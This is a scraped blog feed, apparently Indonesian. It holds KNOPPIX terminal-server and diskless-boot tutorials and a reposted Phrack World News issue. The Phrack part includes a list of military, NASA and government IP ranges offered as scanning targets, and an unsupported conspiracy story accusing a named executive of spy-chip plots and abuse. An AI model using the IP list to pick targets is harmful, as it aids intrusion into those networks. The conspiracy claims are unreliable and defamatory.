"$NFSDIR" ]; then<br />echo -n "${CRE}${BLUE}Trying to mount CD on" \<br />"${MAGENTA}$NFSDIR${BLUE}...${NORMAL}"<br />/static/mount -t nfs -o \<br />ro,rsize=8192,wsize=8192,hard,intr$SECUREOPTIONS \<br />"${NFSDIR}" /cdrom > /dev/null 2>&amp;1 &amp;&amp; MOUNTED="yes"<br /># unsuccessful? Blank out NFSDIR and see if pump does better<br />[ -z "$MOUNTED" ] &amp;&amp; echo "${RED}Failed.${NORMAL}" &amp;&amp; NFSDIR=<br />fi<br /></span></p><p style="font-family:courier new;"><span class="fixed_width" style="font-size:85%;">dirubah menjadi seperti berikut :<br /></span></p><p style="font-family:courier new;"><span class="fixed_width" style="font-size:85%;"># if we have an NFSDIR, try mounting it<br />if [ -n "$NFSDIR" ]; then<br />echo -n "${CRE}${BLUE}Trying to mount CD on" \<br />"${MAGENTA}$NFSDIR${BLUE}...${NORMAL}"<br />/static/mount -t nfs -o \<br />ro,rsize=8192,wsize=8192,hard,intr$SECUREOPTIONS \<br />"${NFSDIR}" /KNOPPIX > /dev/null 2>&amp;1 &amp;&amp; MOUNTED="yes"<br /># unsuccessful? Blank out NFSDIR and see if pump does better<br />[ -z "$MOUNTED" ] &amp;&amp; echo "${RED}Failed.${NORMAL}" &amp;&amp; NFSDIR=<br />fi<br /></span></p><p style="font-family:courier new;"><span class="fixed_width" style="font-size:85%;">- dari baris ke 304 - 321 adalah sebagai berikut :<br />FOUND_KNOPPIX=""<br />if test -f /cdrom/KNOPPIX/KNOPPIX<br />then<br />echo -n "${CRE} ${GREEN}Accessing KNOPPIX CDROM image at ${MAGENTA}<br />$NFSDIR${GREEN}...${NORMAL}"<br />FOUND_KNOPPIX="true"<br />else<br />dropshell<br />fi<br /># Harddisk-installed script part version has been removed<br /># (KNOPPIX can be booted directly from HD now).<br /># DEBUG<br /># echo "6″ > /proc/sys/kernel/printk<br />$INSMOD /modules/cloop.*o file=/cdrom/KNOPPIX/KNOPPIX<br />mountit /dev/cloop /KNOPPIX "-o ro$SECUREOPTIONS" || FOUND_KNOPPIX=""<br /></span></p><p style="font-family:courier new;"><span class="fixed_width" style="font-size:85%;">dirubah menjadi seperti berikut :<br /></span></p><p style="font-family:courier new;"><span class="fixed_width" style="font-size:85%;">FOUND_KNOPPIX=""<br />#if test -f /cdrom/KNOPPIX/KNOPPIX<br />#then<br />echo -n "${CRE} ${GREEN}Accessing KNOPPIX CDROM image at ${MAGENTA}<br />$NFSDIR${GREEN}...${NORMAL}"<br />FOUND_KNOPPIX="true"<br />#else<br />#dropshell<br />#fi<br /># Harddisk-installed script part version has been removed<br /># (KNOPPIX can be booted directly from HD now).<br /># DEBUG<br /># echo "6″ > /proc/sys/kernel/printk<br />#$INSMOD /modules/cloop.*o file=/cdrom/KNOPPIX/KNOPPIX<br />#mountit /dev/cloop /KNOPPIX "-o ro$SECUREOPTIONS" || FOUND_KNOPPIX=""<br /></span></p><p style="font-family:courier new;"><span class="fixed_width" style="font-size:85%;">6. jalankan knoppix-terminalserver<br />7. kemudian, lakukan boot pada client<br /></span></p><p style="font-family:courier new;"><span class="fixed_width" style="font-size:85%;">Konfigurasi Diskboot untuk client<br />Setelah proses diatas selesai semua, yang harus dilakukan kemudian<br />adalah membuat diskboot untuk client (yang NICnya tidak memiliki<br />fasilitas (PXE/bootrom). Untuk NIC yang memiliki bootrom kita tinggal<br />mengeset bios agar boot sequencenya dimulai dari network boot.<br /></span></p><p style="font-family:courier new;"><span class="fixed_width" style="font-size:85%;">Untuk membuat diskboot adalah dengan cara men-download diskboot image<br />dari <a target="_blank" rel="nofollow" href="http://rom-o-matic.net/5.2.5/">http://rom-o-matic.net/5.2.5/</a> . Cari boot image sesuai dengan<br />tipe dan merek NIC yang anda gunakan. Pada ROM output format pilih<br />Floppy bootable ROM Image (.zdsk) kemudian Get ROM.<br /></span></p><p style="font-family:courier new;"><span class="fixed_width" style="font-size:85%;">Setelah selesai proses download, langkah selanjutnya adalah menulis<br />file tersebut kedalam disket dari shell dengan perintah :<br /></span></p><p style="font-family:courier new;"><span class="fixed_width" style="font-size:85%;">cat eb-5.2.5-tipeNICanda.zdsk > /dev/fd0<br /></span></p><p style="font-family:courier new;"><span class="fixed_width" style="font-size:85%;">Gunakan disket tersebut untuk boot dari komputer client.<br /></span></p><p style="font-family:courier new;"><span class="fixed_width" style="font-size:85%;">Pemanfaatan Thin Client dengan KNOPPIX Terminal Server<br /></span></p><p style="font-family:courier new;"><span class="fixed_width" style="font-size:85%;">Thin client dapat digunakan untuk berbagai keperluan. Diantaranya<br />adalah untuk client warung internet (warnet) atau pusat komputer di<br />institusi pendidikan (sekolah atau kampus). Thin client sangat<br />memudahkan dalam hal pemeliharaan sistem karena sifatnya yang terpusat<br />di server sehingga client tidak perlu di-install sistem operasi dan<br />aplikasinya. Hal ini bisa mengurangi beban administratornya .<br /></span></p><span style=";font-family:Courier,Monospaced;font-size:85%;" class="fixed_width" >Referensi : <a target="_blank" rel="nofollow" href="http://www.knoppix.net/">www.knoppix.net</a> </span><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-6241902538623826225?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-67583105436241435132008-05-13T04:52:00.003+07:002008-05-13T05:00:14.198+07:00<span class="fixed_width" style="font-family:Courier,Monospaced;font-size:85%;">Steps :<br /><br />1. "Copy all content" cd knoppix to freebsd server (ex. /usr/diskless/)<br />cp - Rp /cdrom/* /usr/diskless<br /></span><p><span class="fixed_width" style="font-family:Courier,Monospaced;font-size:85%;">2. make directory for save kernel linux/diskless<br />mkdir /tftpboot<br /></span></p><p><span class="fixed_width" style="font-family:Courier,Monospaced;font-size:85%;">3. edit file /etc/inetd.conf and erase comment(#) from tftp<br />vi /etc/inetd.conf<br /></span></p><p><span class="fixed_width" style="font-family:Courier,Monospaced;font-size:85%;">4. restart inetd<br /></span></p><p><span class="fixed_width" style="font-family:Courier,Monospaced;font-size:85%;">5. configurasi file dhcpd.conf<br /></span></p><p><span class="fixed_width" style="font-family:Courier,Monospaced;font-size:85%;">6. Add : filename “/pxelinux.0″ -> on file configurasi<br />dhcpd.conf<br /></span></p><p><span class="fixed_width" style="font-family:Courier,Monospaced;font-size:85%;">7. Add : option-root-path “192.168.0.1:/usr/diskless” -> (/usr/<br />diskless : up to you about name directory) on file configurasi<br />dhcpd.conf. 192.168.0.1 -> ip server for save image knoppix<br />(using NFS).<br /></span></p><p><span class="fixed_width" style="font-family:Courier,Monospaced;font-size:85%;">8. starting dhcpd<br />/usr/sbin/dhcpd<br /></span></p><p><span class="fixed_width" style="font-family:Courier,Monospaced;font-size:85%;">9. copy file vmlinux, pxelinux.0, boot.msg, logo.16, pxelinux.cfg/<br />default dari directory /tftpboot ->boot via knoppix condition<br /></span></p><p><span class="fixed_width" style="font-family:Courier,Monospaced;font-size:85%;">10. boot via client</span> </p><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-6758310543624143513?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-14178648417855480102008-04-24T09:58:00.005+07:002008-05-13T05:01:18.096+07:00<div style="text-align: center;font-family:arial;"><span style="font-size:85%;">==Phrack Inc.==<br /><br /> Volume 0x0c, Issue 0x41, Phile #0x03 of 0x0f<br /><br />|=--------------------------------------------------------------------=|<br />|=-----------------------=[ Phrack World News]=-----------------------=|<br />|=----------------------------=[ by TCLH ]=---------------------------=|<br />|=--------------------------------------------------------------------=|<br /></span></div><span style=";font-family:arial;font-size:85%;" ><br /><br />The Circle of Lost Hackers is looking for any kind of news related to<br />security, hacking, conference report, philosophy, psychology, surrealism,<br />new technologies, space war, spying systems, information warfare, secret<br />societies, ... anything interesting! It could be a simple news with just<br />an URL, a short text or a long text. Feel free to send us your news.<br /><br />We didn't get any news from the Underground since our last phrack issue,<br />it means that one more time all the news reports are coming from<br />friends of our's.<br /><br />It would be good if people who claim themself "underground" would send<br />us their news...<br /><br />Is our underground dead?<br /><br /><br />1. Speedy Gonzales news<br />2. How is CSPP controlloing US education network?<br />3. Retrospective of underground scene<br />4. Killer robots<br />5. Meaningful IP addresses<br /><br />--------------------------------------------<br /><br /><br />--[ 1.<br /><br />*-[ The underground complot: when quebec scene takes too much LSD ]-<br /><br />http://www.mindkind.org/mindkind1011.zip<br /><br /><br />*-[ "king of the carders" but busted ]-<br /><br />http://www.theregister.co.uk/2007/09/18/max_butler_affidavit/<br /><br /><br />*-[ "secure area" and "Microsoft" don't belong in the same sentence ]-<br /><br />http://www.stuff.co.nz/4269090a28.html<br /><br /><br />*-[ Being an ethical hacker is definitely not a good idea ]-<br /><br />http://www.smh.com.au/news/security/police-swoop-on-hacker-of-the-year/2007<br />/11/15/1194766821481.html?page=2<br /><br /><br />*-[ When NSA teaches you how to hack ]-<br /><br />https://www.hackerdegree.com<br /><br />Do they read phrack? :)<br /><br /><br />*-[ When Phrack is a sponsor without its permission ]-<br /><br />http://conference.hackinthebox.org/hitbsecconf2007kl/?page_id=65<br /><br /><br />*-[ Terrorism excuse is good for spying business ]-<br /><br />http://www.corpwatch.org/article.php?id=14821<br /><br />SAIC...<br /><br /><br />*-[ Entersect sounds like an interesting target...]-<br /><br />http://www.washingtonpost.com/wp-dyn/content/article/2008/<br />04/01/AR2008040103049_pf.html<br /><br /><br />*-[ Want to work for MI6? ]-<br /><br />http://news.bbc.co.uk/player/nol/newsid_6150000/newsid_6153000/<br />6153092.stm?bw=bb&amp;mp=rm&amp;nol_storyid=6153092&amp;news=1<br /><br /><br />*-[ Flight "not" Simulator ]-<br /><br />http://www.theregister.co.uk/2008/01/07/<br />boeing_dreamliner_hacker_concerns/<br /><br /><br />*-[ This design looks familiar...]-<br /><br />http://hex90.org/<br /><br /><br />*-[ After hacking your brain: hacking your heart!]-<br /><br />http://packetstormsecurity.org/papers/attack/icd-study.pdf<br /><br /><br /><br />--[ 2. How is CSPP controlling US education network ]--<br /> by dahut<br /><br />http://www.mccullagh.org/db9/d30-32/kay-rosen-holleyman-1.jpg<br /><br />The above picture shows Ken Kay, executive director of the Computer<br />Systems Policy Project on the left and Robert Holleyman, president and<br />CEO of the Business Software Alliance on the right.<br /><br />CSPP (www.cspp.org) was created in 1989, and later on renamed as<br />Technology CEO Council. Bigger members are Applied Material, Dell, EMC,<br />HP, IBM, Intel, Motorola, NCR and Unisys. All these companies together<br />are generating 300 billion dollars of annual revenues.<br /><br />The company was made on request of the US President, to promote<br />U.S. competitiveness through technology leadership. You can think<br />technology is for information technology. You are wrong. It's for<br />Intelligence technology.<br /><br />The project is two steps. First is to invent a spy chip and<br />put it in every computer manufactured in US. So did Fairchild<br />(http://en.wikipedia.org/wiki/Fairchild_Semiconductor) by producing the<br />Clipper chip (http://en.wikipedia.org/wiki/Clipper_architecture).<br />The Clipper was designed with internal circuitry to encrypt information<br />and deliver backdoor capabilities, a little bit as the previous PROMIS<br />software was doing with Mainframe.<br /><br />The Clipper was designed for RISC workstation. After a bankruptcy of<br />Fairchild, and seeing that Hitachi was interested to acquire the company,<br />the US government requested Intergraph to continue the project. So<br />they did by starting the production of a new UNIX workstation line,<br />named Interpro32 and running AT&amp;T Unix operating system.<br /><br />So, the operating system was containing code to activate the secret<br />part of the CPU, and access to users' data. The following declassified<br />document explains to the US administration how dangerous it could<br />be to continue to use the Clipper chip in conjunction with AT&amp;T:<br />http://www.softwar.net/bush.html. CIA and NSA are involved in this<br />document.<br /><br />Now that the main US chipset and computer manufacturers are in the<br />secrets of the CIA intelligence, let's go for step two.<br /><br />In 1996, the US president Clinton did ask to create the CEO Forum,<br />managed by Ken Kay, to establish the best rules for the future<br />classrooms, assuming they will be well connected to the Internet, with<br />the best possible hardware. Members were Apple, Dell, IBM, Compaq, HP,<br />Sun... Next, the US government did ask again to Ken Kay in 2002 to<br />create the Partnership for 21st Century Skills to be at the center of US<br />K-12 education by building collaborative partnerships among education,<br />business, community and government leader (www.21stcenturyskills.org). It<br />was a follow up to the CEO Forum.<br /><br />Members are:<br /><br />* Adobe, AOL, Apple, AT&amp;T, Cisco, Dell, Intel, Microsoft, SAP, Oracle...<br />* National Education Association, Ford Motor Company (?) and the US<br />Department of Education<br /><br />Ken Kay is in charge of driving all these companies to install computer,<br />software and networks systems in all schools of USA, as well as dictating<br />the content of the courses!<br /><br />Thinking back to the picture in front of this article, you can make<br />the connection between all software companies, the BSA company and Ken<br />Kay. Thanks to the clipper chip success, they all know how to watch you!<br />The cherry on the cake will be to tell you that Ken Kay is managing WWASP,<br />the largest world network of special establishment for "Teens In Crisis".<br />www.wwasp.com<br /><br />http://en.wikipedia.org/wiki/World_Wide_Association_of_Specialty_Programs_<br />and_Schools<br /><br />Many parents are complaining against the treatment methods employed by<br />WWASPS institutions. These methods are said to be controversial, as there<br />have been allegations of severe (sexual) abuse and torture by staff.<br />In 2004, during a testimony, Ken Kay stated that in his opinion, sexual<br />activity between staff members and students is "not necessarily abuse".<br />How do you explain that Ken Kay is controlling the whole US computer<br />industry, as well as the US education, and able to manage a galaxy of<br />establishments doing sexual abuses in its total acceptation? (See also<br />http://antiwwasp.com/)<br /><br /><br /><br />--[ 3. Retrospective of The Underground scene ]--<br /> by Duvel<br /><br />Almost one year after the release of "A brief History of the Underground<br />Scene", it's now time to give some feedback. First of all, The Phrack<br />Staff and I would like to thank you all for your positive and negative<br />comments about this article. The goal of this article was not to<br />explain what the scene once was or what should be but more to provoke<br />the debate. And on this point the article was a success. Now it's time<br />to act.<br /><br />About the negative comments that I had, I won't reply to each of one.<br />As you have probably seen, I didn't reply to any negative or positive<br />comments (except one at the beginning...my bad) I prefer let people<br />talk. But I was quite amused to see negative comments which for the<br />majority were on some insignificant points (speech recognition is not<br />datamining, this guy doesn't know subnets, underground pyramid is for<br />Holywood magazine or hacking tricks are too lame). It would be stupid<br />to reply to them. So I won't.<br /><br />One of the thing that I am the most happy about is that a lot of young<br />generations of hackers have found this article interesting and found their<br />way through it. As you have probably seen, there is another article about<br />the Underground scene in this issue. Anonymous' opinion is opposite<br />to mine but if you read beetween the lines, we both go to the same<br />direction.<br /><br />Of course it's important to understand the history of hacking (what<br />I tried to explain in my article) or how the underground died (what<br />Anonymous tries to explain in his article) but it's more important<br />to keep hackers alive. Even if the Underground won't ever be the same,<br />the passion is still there. It's this passion of hacking that should<br />stay alive.<br /><br />I really hope that all people who gave constructive comments can<br />participate to the new Underground. A lot of people talk but don't do<br />anything. I've seen lots of interesting comment from people who want to<br />do something but at this stage we haven't seen anything from them. Are<br />these people too busy? Are these people just dreamers? Are these people<br />lacking required knowledge? Are these people....? I don't know.<br /><br />But this message is for these people: please stop talking but try to bring<br />something to new generation of hackers.<br /><br />They need you.<br /><br />--[ 4. Killer robots ]--<br /><br />My roomba can get lost under the dining room table, bumping off<br />the chair legs, over and over. There are many routes of escape,<br />but it rarely finds one. Only a true genius could turn this<br />remarkable example of AI into a killing machine.<br /><br /><br />http://blog.wired.com/defense/2007/10/roomba-maker-un.html<br />--------------------------------------------------------------------<br />The makers of the cuter-than-cute robotic vacuum cleaner are<br />rolling out a new machine: A big, fast-moving, semi-autonomous<br />'bot capable of killing a whole bunch of people at once.<br /><br />Unlike other armed robots -- which are entirely remote-controlled<br />-- the Warriors are "being engineered with advanced software,<br />giving them the ability to perform some battlefield functions<br />autonomously."<br /><br />At the same time, a key dimension to the Warrior X700 is its<br />ability to protect soldiers by firing weapons such as a machine<br />gun or 40mm explosive round.<br />--------------------------------------------------------------------<br /><br /><br />Bring in the big guns.<br /><br /><br />http://blog.wired.com/defense/2007/10/robot-cannon-ki.html<br />--------------------------------------------------------------------<br />We're not used to thinking of them this way. But many advanced<br />military weapons are essentially robotic -- picking targets out<br />automatically, slewing into position, and waiting only for a<br />human to pull the trigger. Most of the time. Once in a while,<br />though, these machines start firing mysteriously on their own.<br /><br />During the shooting trials at Armscor's Alkantpan shooting range,<br />"I personally saw a gun go out of control several times," Young<br />says. "They made a temporary rig consisting of two steel poles on<br />each side of the weapon, with a rope in between to keep the<br />weapon from swinging. The weapon eventually knocked the pol[e]s<br />down."<br /><br />Mangope told The Star that it "is assumed that there was a<br />mechanical problem, which led to the accident. The gun, which was<br />fully loaded, did not fire as it normally should have," he said.<br />"It appears as though the gun, which is computerised, jammed<br />before there was some sort of explosion, and then it opened fire<br />uncontrollably, killing and injuring the soldiers."<br /><br />But the brave, as yet unnamed officer was unable to stop the<br />wildly swinging computerised Swiss/German Oerlikon 35mm MK5<br />anti-aircraft twin-barrelled gun. It sprayed hundreds of<br />high-explosive 0.5kg 35mm cannon shells around the five-gun<br />firing position.<br /><br />By the time the gun had emptied its twin 250-round<br />auto-loader magazines, nine soldiers were dead and 11 injured.<br />--------------------------------------------------------------------<br /><br /><br />Can I play too?<br /><br /><br />http://blog.wired.com/defense/2007/12/new-killer-bot.html<br />--------------------------------------------------------------------<br />The stars: "a 25-year-old self-taught engineer named Adam<br />Gettings" and his "toy-like but gun-wielding robot designed to<br />replace human soldiers on the battlefield."<br /><br />Gettings' company doesn't have much of an online signature -- not<br />even a website. But he does have some interesting partners,<br />including former Disney imagineer Terry Izumi (who cooked up this<br />video for the 'bot) and shotgun maker Jerry Barber (who provided<br />the firepower). Blackwater has also endorsed the product,<br />allegedly.<br />--------------------------------------------------------------------<br /><br /><br />Blackwater and Disney? Who could ask for better qualifications?<br />Oh, and there's this cool marketing video.<br /><br /><br />http://money.cnn.com/video/ft/#/video/fortune/2007/12/04/robotex.fortune<br /><br /><br />Robot wars, anyone?<br /><br /><br />http://blog.wired.com/defense/2007/05/top_war_tech_5_.html<br />--------------------------------------------------------------------<br /><br />"The Baghdad bomb squad used their iRobots to decorate their<br />shop," Noah reported after an embed with an Army<br />ordnance-disposal unit a couple years back. "Not far away, at the<br />U.S. military's central robot depot for Iraq, the iRobots sat on<br />shelves, serenely gathering dust, while Foster-Miller's Talon<br />robots would come back, scarred and in pieces, after being chewed<br />up by a bomb."<br /><br />The company noted that war zone "Robot Hospitals" are repairing<br />more than 400 bomb-damaged robots a week to put them back into<br />service.<br />--------------------------------------------------------------------<br /><br /><br />My bot can kick your bot's ass. Great. But how do they stand up<br />against humans?<br /><br />Not the kind of humans that throw rocks at tanks, but the<br />thinking kind, like the ones that broke Israeli comms crypto<br />during the recent war in Lebanon.<br /><br />Let's see what happens when it comes across a carpet stretched<br />over a pit. Or somebody throws a blanket over it, or spray paints<br />the camera lens, or fires IR lasers or very bright oLEDS at the<br />camera.<br /><br />Once you have physical access to the thing, you own it. How hard<br />would it be to re-chip the thing and send it back against its<br />makers?<br /><br />Can we test our killer-robot counter measures? Maybe. The<br />opportunity may soon be as close as your local pigsty.<br /><br /><br />http://blog.wired.com/defense/2007/08/armed-robots-so.html<br />--------------------------------------------------------------------<br />Armed robots -- similar to the ones now on patrol in Iraq -- are<br />being marketed to domestic police forces, according to the<br />machines' manufacturer and law enforcement officers.<br /><br />Foster-Miller, maker of the armed SWORDS robot for military use,<br />is also actively promoting a similar model to domestic, civilian<br />police forces. The Talon SWAT/MP is a "robot specifically<br />equipped for scenarios frequently encountered by police SWAT<br />[special weapon and tactics] units and MPs [military police]," a<br />company fact sheet announces. It "can be configured with the<br />following equipment:<br /><br />. Multi-shot TASER electronic control device with laser-dot<br />aiming.<br />. Loudspeaker and audio receiver for negotiations.<br />. Night vision and thermal cameras.<br />. Choice of weapons for lethal or less-than-lethal responses<br />- 40 mm grenade launcher - 2 rounds<br />- 12-gage shotgun - 5 rounds<br />- FN303 less-lethal launcher - 15 rounds.<br /><br />In addition to the Massachusetts State Police, SWAT teams in<br />Houston, San Francisco, and Lubbock, TX all have the robots,<br />according to Foster-Miller spokesperson Cynthia Black.<br />--------------------------------------------------------------------<br /><br /><br />Finally, a legitimate excuse for Swatting.<br /><br /><br />http://en.wikipedia.org/wiki/Swatting<br />--------------------------------------------------------------------<br />In the field of Information Security, Swatting is an attempt to<br />trick an emergency service to dispatch an emergency response<br />team. The name derives from attempts to trick an emergency<br />services operator (a "911 operator") into dispatching a SWAT<br />(Special Weapons and Training) team to a location under false<br />pretense.<br />--------------------------------------------------------------------<br /><br /><br />What next?<br /><br /><br />http://blog.wired.com/defense/2007/11/black-knight.html<br />--------------------------------------------------------------------<br />We now know that there are robotic cars smart enough to drive<br />themselves around a city. The next step: give those vehicles<br />automatic weapons, of course.<br /><br />Or the troops can stay just chill out, and let the thing drive<br />itself. The Knight uses "advanced robotic technology for<br />autonomous mobility," according to BAE. "This capability allows<br />the Black Knight to plan routes, maneuver on the planned route,<br />and avoid obstacles - all without operator intervention."<br />--------------------------------------------------------------------<br /><br /><br />http://blog.wired.com/defense/2008/01/israel-thinking.html<br />--------------------------------------------------------------------<br />So Israeli military leaders have begun early planning for a new,<br />robotic defense system, armed with enough artificial intelligence<br />that it "could take over completely" from flesh-and-blood<br />operators. "It will be designed for... autonomous operations,'<br />Brig. Gen. Daniel Milo, commander of Israel's air defense forces,<br />tells Defense News' Barbara Opall-Rome. And in the event of a<br />"doomsday" strike, Opall-Rome notes, the system could handle<br />"attacks that exceed physiological limits of human command."<br /><br />How do you say "Skynet" in Hebrew, again?<br />--------------------------------------------------------------------<br /><br /><br />http://www.reuters.com/article/oddlyEnoughNews/idUST27506220080408?feedType=RSS&amp;feedName=oddlyEnoughNews&amp;rpc=22&amp;sp=true<br />--------------------------------------------------------------------<br />Robots could fill the jobs of 3.5 million people in graying Japan<br />by 2025, a thinktank says, helping to avert worker shortages as<br />the country's population shrinks.<br /><br />Caregivers would save more than an hour a day if robots helped<br />look after children, older people and did some housework, it<br />added. Robotic duties could include reading books out loud or<br />helping bathe the elderly.<br />--------------------------------------------------------------------<br /><br /><br />Don't drop the soap.<br /><br /><br />--[ 5. Meaningful IP addresses ]--<br /><br />Here are some IP addresses that people send us...we haven't tried anything<br />so don't blame us. If you have more ranges feel free to share.<br /><br />But before, the best IP list is probably the one on cryptome:<br /><br />http://cryptome.org/nsa-ip-update14.htm<br /><br /><br />-----<br /><br />RANGE 6<br />6.* - Army Information Systems Center<br /><br />RANGE 7<br />7.*.*.* Defense Information Systems Agency, VA<br /><br />RANGE 11<br />11.*.*.* DoD Intel Information Systems, Defense Intelligence Agency,<br />Washington DC<br /><br />RANGE 21<br />21. - US Defense Information Systems Agency<br /><br />RANGE 22<br />22.* - Defense Information Systems Agency<br /><br />RANGE 24<br />24.198.*.*<br /><br />RANGE 25<br />25.*.*.* Royal Signals and Radar Establishment, UK<br /><br />RANGE 26<br />26.* - Defense Information Systems Agency<br /><br />RANGE 29<br />29.* - Defense Information Systems Agency<br /><br />RANGE 30<br />30.* - Defense Information Systems Agency<br /><br />RANGE 49<br />49.* - Joint Tactical Command<br /><br />RANGE 50<br />50.* - Joint Tactical Command<br /><br />RANGE 55<br />55.* - Army National Guard Bureau<br /><br />RANGE 55<br />55.* - Army National Guard Bureau<br /><br />RANGE 62<br />62.0.0.1 - 62.30.255.255 Do not scan!<br /><br />RANGE 64<br />64.70.*.* Do not scan<br />64.224.* Do not Scan<br />64.225.* Do not scan<br />64.226.* Do not scan<br /><br />RANGE 128<br />128.37.0.0 Army Yuma Proving Ground<br />128.38.0.0 Naval Surface Warfare Center<br />128.43.0.0 Defence Research Establishment-Ottawa<br />128.47.0.0 Army Communications Electronics Command<br />128.49.0.0 Naval Ocean Systems Center<br />128.50.0.0 Department of Defense<br />128.51.0.0 Department of Defense<br />128.56.0.0 U.S. Naval Academy<br />128.60.0.0 Naval Research Laboratory<br />128.63.0.0 Army Ballistics Research Laboratory<br />128.80.0.0 Army Communications Electronics Command<br />128.98.0.0 - 128.98.255.255 Defence Evaluation and Research Agency<br />128.102.0.0 NASA Ames Research Center<br />128.149.0.0 NASA Headquarters<br />128.154.0.0 NASA Wallops Flight Facility<br />128.155.0.0 NASA Langley Research Center<br />128.156.0.0 NASA Lewis Network Control Center<br />128.157.0.0 NASA Johnson Space Center<br />128.158.0.0 NASA Ames Research Center<br />128.159.0.0 NASA Ames Research Center<br />128.160.0.0 Naval Research Laboratory<br />128.161.0.0 NASA Ames Research Center<br />128.183.0.0 NASA Goddard Space Flight Center<br />128.190.0.0 Army Belvoir Reasearch and Development Center<br />128.202.0.0 50th Space Wing<br />128.216.0.0 MacDill Air Force Base<br />128.217.0.0 NASA Kennedy Space Center<br />128.236.0.0 U.S. Air Force Academy<br /><br />RANGE 129<br />129.23.0.0 Strategic Defense Initiative Organization<br />129.29.0.0 United States Military Academy<br />129.50.0.0 NASA Marshall Space Flight Center<br />129.51.0.0 Patrick Air Force Base<br />129.52.0.0 Wright-Patterson Air Force Base<br />129.53.0.0 - 129.53.255.255 66SPTG-SCB<br />129.54.0.0 Vandenberg Air Force Base, CA<br />129.92.0.0 Air Force Institute of Technology<br />129.99.0.0 NASA Ames Research Center<br />129.131.0.0 Naval Weapons Center<br />129.139.0.0 Army Armament Research Development and Engineering Center<br />129.141.0.0 85 MISSION SUPPORT SQUADRON/SCSN<br />129.163.0.0 NASA/Johnson Space Center<br />129.164.0.0 NASA IVV<br />129.165.0.0 NASA Goddard Space Flight Center<br />129.166.0.0 NASA - John F. Kennedy Space Center<br />129.167.0.0 NASA Marshall Space Flight Center<br />129.168.0.0 NASA Lewis Research Center<br />129.190.0.0 Naval Underwater Systems Center<br />129.198.0.0 Air Force Flight Test Center<br />129.209.0.0 Army Ballistics Research Laboratory<br />129.229.0.0 U.S. Army Corps of Engineers<br />129.251.0.0 United States Air Force Academy<br /><br />RANGE 130<br />130.40.0.0 NASA Johnson Space Center<br />130.90.0.0 Mather Air Force Base<br />130.109.0.0 Naval Coastal Systems Center<br />130.114.0.0 Army Aberdeen Proving Ground Installation Support Activity<br />130.124.0.0 Honeywell Defense Systems Group<br />130.165.0.0 U.S.Army Corps of Engineers<br />130.167.0.0 NASA Headquarters<br /><br />RANGE 131<br />131.3.0.0 - 131.3.255.255 Mather Air Force Base<br />131.6.0.0 Langley Air Force Base<br />131.10.0.0 Barksdale Air Force Base<br />131.17.0.0 Sheppard Air Force Base<br />131.21.0.0 Hahn Air Base<br />131.22.0.0 Keesler Air Force Base<br />131.24.0.0 6 Communications Squadron<br />131.25.0.0 Patrick Air Force Base<br />131.27.0.0 75 ABW<br />131.30.0.0 62 CS/SCSNT<br />131.32.0.0 37 Communications Squadron<br />131.35.0.0 Fairchild Air Force Base<br />131.36.0.0 Yokota Air Base<br />131.37.0.0 Elmendorf Air Force Base<br />131.38.0.0 Hickam Air Force Base<br />131.39.0.0 354CS/SCSN<br />131.40.0.0 Bergstrom Air Force Base<br />131.44.0.0 Randolph Air Force Base<br />131.46.0.0 20 Communications Squadron<br />131.47.0.0 Andersen Air Force Base<br />131.50.0.0 Davis-Monthan Air Force Base<br />131.52.0.0 56 Communications Squadron /SCBB<br />131.54.0.0 Air Force Concentrator Network<br />131.56.0.0 Upper Heyford Air Force Base<br />131.58.0.0 Alconbury Royal Air Force Base<br />131.59.0.0 7 Communications Squadron<br />131.61.0.0 McConnell Air Force Base<br />131.62.0.0 Norton Air Force Base<br />131.71.0.0 - 131.71.255.255 NAVAL AVIATION DEPOT CHERRY PO<br />131.74.0.0 Defense MegaCenter Columbus<br />131.84.0.0 Defense Technical Information Center<br />131.92.0.0 Army Information Systems Command - Aberdeen (EA)<br />131.105.0.0 McClellan Air Force Base<br />131.110.0.0 NASA/Michoud Assembly Facility<br />131.120.0.0 Naval Postgraduate School<br />131.121.0.0 United States Naval Academy<br />131.122.0.0 United States Naval Academy<br />131.176.0.0 European Space Operations Center<br />131.182.0.0 NASA Headquarters<br />131.250.0.0 Office of the Chief of Naval Research<br /><br />RANGE 132<br />132.3.0.0 Williams Air Force Base<br />132.5.0.0 - 132.5.255.255 49th Fighter Wing<br />132.6.0.0 Ankara Air Station<br />132.7.0.0 - 132.7.255.255 SSG/SINO<br />132.9.0.0 28th Bomb Wing<br />132.10.0.0 319 Comm Sq<br />132.11.0.0 Hellenikon Air Base<br />132.12.0.0 Myrtle Beach Air Force Base<br />132.13.0.0 Bentwaters Royal Air Force Base<br />132.14.0.0 Air Force Concentrator Network<br />132.15.0.0 Kadena Air Base<br />132.16.0.0 Kunsan Air Base<br />132.17.0.0 Lindsey Air Station<br />132.18.0.0 McGuire Air Force Base<br />132.19.0.0 100CS (NET-MILDENHALL)<br />132.20.0.0 35th Communications Squadron<br />132.21.0.0 Plattsburgh Air Force Base<br />132.22.0.0 23Communications Sq<br />132.24.0.0 Dover Air Force Base<br />132.25.0.0 786 CS/SCBM<br />132.27.0.0 - 132.27.255.255 39CS/SCBBN<br />132.28.0.0 14TH COMMUNICATION SQUADRON<br />132.30.0.0 Lajes Air Force Base<br />132.31.0.0 Loring Air Force Base<br />132.33.0.0 60CS/SCSNM<br />132.34.0.0 Cannon Air Force Base<br />132.35.0.0 Altus Air Force Base<br />132.37.0.0 75 ABW<br />132.38.0.0 Goodfellow AFB<br />132.39.0.0 K.I. Sawyer Air Force Base<br />132.40.0.0 347 COMMUNICATION SQUADRON<br />132.42.0.0 Spangdahlem Air Force Base<br />132.43.0.0 Zweibruchen Air Force Base<br />132.45.0.0 Chanute Air Force Base<br />132.46.0.0 Columbus Air Force Base<br />132.48.0.0 Laughlin Air Force Base<br />132.49.0.0 366CS/SCSN<br />132.50.0.0 Reese Air Force Base<br />132.52.0.0 Vance Air Force Base<br />132.54.0.0 Langley AFB<br />132.55.0.0 Torrejon Air Force Base<br />132.56.0.0 - 132.56.255.255 9 CS/SC<br 